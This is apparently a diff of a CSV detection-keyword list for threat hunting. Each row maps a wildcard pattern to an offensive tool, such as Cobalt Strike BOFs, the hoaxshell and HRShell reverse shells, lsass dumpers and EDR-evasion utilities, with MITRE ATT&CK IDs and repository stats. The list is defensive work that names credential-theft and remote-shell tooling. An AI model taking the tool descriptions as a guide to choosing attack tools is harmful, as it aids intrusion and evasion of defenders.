This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HiddenDesktop.x64.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HiddenDesktop.x86.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HiddenDesktop.zip*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*hide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Hidden.Desktop.mp4*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop * *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.x64.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.x86.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.zip*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*hide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*HideProcess*","offensive_tool_keyword","HideProcess","process injection rootkit","T1055 - T1055.012 - T1055.013 - T1055.015 - T1055.017","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/landhb/HideProcess","1","1","N/A","N/A","5","499","111","2019-03-26T03:35:57Z","2017-03-07T01:30:15Z" -"*HIJACK_DLL_PATH*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve 
arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*HIJACK_DLL_PATH*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*hijack_hunter *","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","0","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" 
"*hijack_remote_thread*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*hijackablepath.c*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*hijackablepath.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - 
T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
 "*hijackCLSIDpersistence.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
-"*hijackDll*WINMM.dll*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*hijackDll*WINMM.dll*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*Hijacker*","offensive_tool_keyword","Hijacker","Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng. Airodump-ng. MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.This application requires an ARM android device with an internal wireless adapter that supports Monitor Mode. A few android devices do. but none of them natively. This means that you will need a custom firmware. Any device that uses the BCM4339 chipset (MSM8974. such as Nexus 5. Xperia Z1/Z2. LG G2. LG G Flex. Samsung Galaxy Note 3) will work with Nexmon (which also supports some other chipsets). Devices that use BCM4330 can use bcmon.","T1135 - T1175 - T1179 - T1189 - T1202","TA0002 - TA0007 - - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","0","N/A","N/A","10","2213","435","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z"
-"*HijackHunter.csproj*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
-"*HijackHunter.exe*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
-"*hijackProgDirMissingDll*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*HijackHunter.csproj*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*HijackHunter.exe*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*hijackProgDirMissingDll*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*HInvokeHashGen.cs*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z"
 "*history_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z"
 "*HiveJack-Console.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
-"*hktalent/scan4all*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*hktalent/scan4all*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
 "*hlldz/dazzleUP*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z"
 "*hlldz/Phant0m*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z"
 "*hlldz/RefleXXion*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z"
 "*hoangprod/AndrewSpecial*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z"
 "*hoaxshell.py*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z"
-"*holehe *@gmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
-"*holehe.core:main*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
-"*holehe\holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
-"*holehe-master.*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
+"*holehe *@gmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
+"*holehe.core:main*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
+"*holehe\holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
+"*holehe-master.*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
 "*hollow *.exe *.bin*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z"
 "*hollower.Hollow(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
 "*home/kali/Downloads*","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*Honey hash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*hookedbrowsers.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
